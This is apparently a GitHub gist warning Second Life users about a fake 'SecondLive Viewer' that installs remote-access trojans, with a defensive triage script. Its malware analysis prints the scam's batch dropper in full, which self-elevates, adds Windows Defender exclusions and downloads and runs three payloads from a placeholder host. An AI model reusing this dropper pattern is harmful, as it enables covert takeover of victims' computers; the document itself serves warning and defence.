@FelixWolf
Last active November 24, 2023 18:55
Second Live Viewer Scam

Whats the scam?

This scam often starts as an instant message from someone in Second Life that looks like the following:

Hello,

Are you tired of spending your hard-earned Linden Dollars? We've got an exciting solution just for you! Introducing our SecondLive Viewer, where everything is not only free but also open for endless possibilities.

  • Unlock unlimited Linden Dollars (L$) for all your virtual adventures.
  • Fly to unlimited heights.
  • Build on any land of your choice, all for free.

But that's just the beginning.

Link: <Some URL, typically a tinyurl link>

We're sincerely thankful to everyone who joins us in our mission to make SecondLife completely free. Don't miss this incredible opportunity.

Best Regards.

Let's take a look at its claims.

  • Unlock unlimited Linden Dollars (L$) for all your virtual adventures.

This isn't possible. L$ balances aren't stored on the client; they are stored on servers that Linden Lab controls. Creating L$ out of thin air would require access to Linden Lab's servers, in which case:

  1. This is fraud, which is a crime. Generating L$ is not legal, and is a violation of both the Terms of Service and federal law.
  2. It is also a violation of the Computer Fraud and Abuse Act, which covers unauthorized access to computers (servers are computers too).
  3. Linden Lab would know instantly. They have systems in place to detect unauthorized logins to their servers, and systems in place to detect fraudulent transactions.
  4. Linden Lab will track the money. No matter how many times you "launder" it, the money is tracked.

Simply put, there is no way to get free L$ other than the currently available methods in SL such as money trees and games.

  • Fly to unlimited heights.

This isn't anything new. Most third-party viewers already allow you to fly to unlimited heights, and LL itself removed the flight height limit.

If you are using Firestorm:

  1. Paste this link in chat secondlife:///app/openfloater/preferences?search=Enable%20usage%20of%20chat%20bar%20as%20a%20command%20line and give it a click
  2. Enable "Enable use of chat bar as a command line"
  3. Type this in chat: gth 50000
  4. Observe you are now 50000 meters in the air!

You can find out what each of these commands do here: https://wiki.firestormviewer.org/preferences_chat_tab#cmdline_tab

  • Build on any land of your choice, all for free.

This isn't possible. Land permissions are checked by the simulator, not the viewer, so a modified viewer cannot grant itself build rights. While it is possible to edit your avatar on any land, it isn't possible to create or rez objects on land where the owner has disabled building. In some cases an object can end up on no-build land, for example a scripted vehicle driving onto it, but that is an intended feature of the simulator, not a bypass.

So what does it actually do?

A lot of stuff you don't want happening. I'll break it down into steps:

  1. You are instructed to download viewer.exe; when run, it pretends to install a viewer so that it looks legitimate.
  2. Upon running the newly installed program, it runs builddata.bat, which looks like this:
```bat
net session>nul 2>&1
if %errorlevel%==0 goto main
echo CreateObject("Shell.Application").ShellExecute "%~f0", "", "", "runas">"%temp%/elevate.vbs"
"%temp%/elevate.vbs"
del "%temp%/elevate.vbs"
exit

:main
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://example.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://example.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://example.com/A -OutFile A.exe;./A.exe;exit
```

This script first relaunches itself with administrator rights ON YOUR COMPUTER: the `net session` check only succeeds when already elevated, otherwise it writes elevate.vbs, which re-runs the batch file with the "runas" verb (that is the UAC prompt you click through). Once elevated, it adds Windows Defender exclusions for C:\Users and Program Files so that nothing dropped there gets scanned, changes into C:\Users\Public, and downloads and runs three files: "V1", "Q" and "A". This is incredibly dangerous, because whatever those files do now runs with full control of the machine.

  1. The script runs "V1", which installs "1" and "2".
  2. "1" installs Trojan.CobaltStrike, the antivirus detection name for a Cobalt Strike beacon. Cobalt Strike is a commercial penetration-testing toolkit that cybercriminals often abuse for remote control of victim machines.
  3. "2" installs Trojan.Molotov/Reflo. While I am not 100% sure about what it does, it is very likely another remote administration toolkit.
  4. "Q" installs Quasar, an open-source remote administration tool (RAT).
  5. "A" installs AsyncRAT, which is also a RAT.
  6. Some of the tools will automatically install additional things not included in the script, such as a cryptominer.
  7. The script then runs start.vbs.

Start.vbs just shows a fake dialog saying that there was an error:

```vbscript
x=msgbox ("The OpenGL driver detected a problem with the display driver and is unable to continue. The application must close. Error code:3",0+64,"Error")
```
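The batch script leaves a few concrete traces on a machine that ran it: the two Defender exclusions, the three payloads in C:\Users\Public, and elevate.vbs in %TEMP% (if the `del` never ran). The PowerShell triage script below is an added example, not part of the original gist and not anything the malware ships; it checks for exactly those traces and, only when run with `-Remediate`, removes the exclusions again. The file names and paths are taken from builddata.bat above; the check for processes executing out of C:\Users\Public is an added heuristic of mine, not something the page establishes about these payloads.

```powershell
param([switch]$Remediate)

# Added triage check, not part of the original gist or of the malware.
# Run from an elevated PowerShell prompt on the suspect machine (ideally
# booted offline). File names and paths come from builddata.bat; the
# process check at the end is a heuristic, not an indicator from the page.

$findings = @()

# 1. Defender exclusions. builddata.bat adds C:\Users and $env:ProgramFiles
#    so the dropped payloads are never scanned. A normal workstation has
#    no exclusions at all, so either of these is a strong indicator.
$badExclusions = @('C:\Users', $env:ProgramFiles) | ForEach-Object { $_.TrimEnd('\') }
$exclusions = (Get-MpPreference).ExclusionPath
foreach ($path in @($exclusions | Where-Object { $_ })) {
    if ($badExclusions -contains $path.TrimEnd('\')) {
        $findings += "Defender exclusion present: $path"
    }
}

# 2. Files the script drops: the three payloads in C:\Users\Public and the
#    self-elevation helper written to %TEMP%. Hash anything found so it can
#    be looked up on VirusTotal without shipping the file around.
$dropped = @(
    'C:\Users\Public\V1.exe',
    'C:\Users\Public\Q.exe',
    'C:\Users\Public\A.exe',
    (Join-Path $env:TEMP 'elevate.vbs')
)
foreach ($file in $dropped) {
    if (Test-Path -LiteralPath $file) {
        $hash = (Get-FileHash -LiteralPath $file -Algorithm SHA256).Hash
        $findings += "Dropped file present: $file (SHA256 $hash)"
    }
}

# 3. Heuristic (assumption, not from the page): on a normal workstation
#    nothing should be executing out of C:\Users\Public.
$publicProcs = Get-Process -ErrorAction SilentlyContinue |
    Where-Object { $_.Path -and $_.Path -like 'C:\Users\Public\*' }
foreach ($p in $publicProcs) {
    $findings += "Process running from Public: $($p.Name) (PID $($p.Id)) $($p.Path)"
}

if ($findings.Count -eq 0) {
    Write-Output 'No traces of builddata.bat found.'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
    Write-Output 'Treat the RATs as installed: back up data, then wipe and reinstall.'
}

# Only change the machine when explicitly asked. Restoring the exclusions
# lets Defender scan again, but it does NOT remove the RATs themselves.
if ($Remediate) {
    foreach ($path in $badExclusions) {
        Remove-MpPreference -ExclusionPath $path
    }
}
```

Run it once without `-Remediate` to collect evidence (the SHA256 values are what you would paste into VirusTotal), and treat a hit on any of the first two checks as confirmation that the machine needs to be wiped rather than cleaned.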

Why so many remote administrative toolkits?

Attackers intentionally install as many backdoors as possible so that removal becomes increasingly difficult and unreliable, to the point where you should just wipe your hard drive and reinstall your operating system.

Is that it? Does it install anything else?

Yes and no:

  • No: the script itself doesn't install anything else.
  • Yes: each of the remote administration toolkits, once installed, checks in with a server the attacker controls, and that server can tell the toolkit to download and install even more.

While I could do further investigation, it involves going further than I feel reasonably safe doing so.

What does a remote administrative toolkit do?

A remote administration tool (also known as a RAT) is basically like giving someone physical access to your computer. Among other things, they can:

  • Steal your username / passwords
  • Steal your browser cookies
  • Steal your files
  • Steal your banking information
  • Steal your L$
  • Steal your REAL WORLD money (through credit / banking / wire fraud)
  • View your webcam and take pictures/videos
  • View your desktop
  • Install additional software
  • Encrypt your files
  • Delete your files

What does a cryptominer do?

A cryptominer uses your CPU and GPU to mine cryptocurrency for the attacker (on a PC this is typically Monero; Bitcoin is no longer profitably minable on consumer hardware). This wastes electricity and computing power, and running the graphics card flat out around the clock shortens its life. You do not see a dime of what they make; your computer is simply turned into a mining rig for someone else.

Help! I installed it! What do I do?

  1. Turn the computer that you installed it on OFF immediately! If the computer is off, they can't access it. Do not put it into "sleep", where the CPU is still running in a low-power mode; make sure it is fully powered off.
  2. Take your device to a computer technician who specializes in removing viruses and malware. Be prepared to have your files backed up and the system reinstalled.
  3. Do not be tempted to use it until it is cleaned! Malware can spread over internal networks, and every moment it is on is another chance for the attacker to steal more data from you. From a different, clean device, change any passwords that were saved or typed on the infected machine, since stealing credentials is one of the first things these tools do.

Virustotal scans:


sldevel commented Nov 3, 2023

The one and only official site to download the Cool VL Viewer binaries and sources is http://sldev.free.fr/
Anyone being offered my viewer by any third party should never accept it and immediately report to me.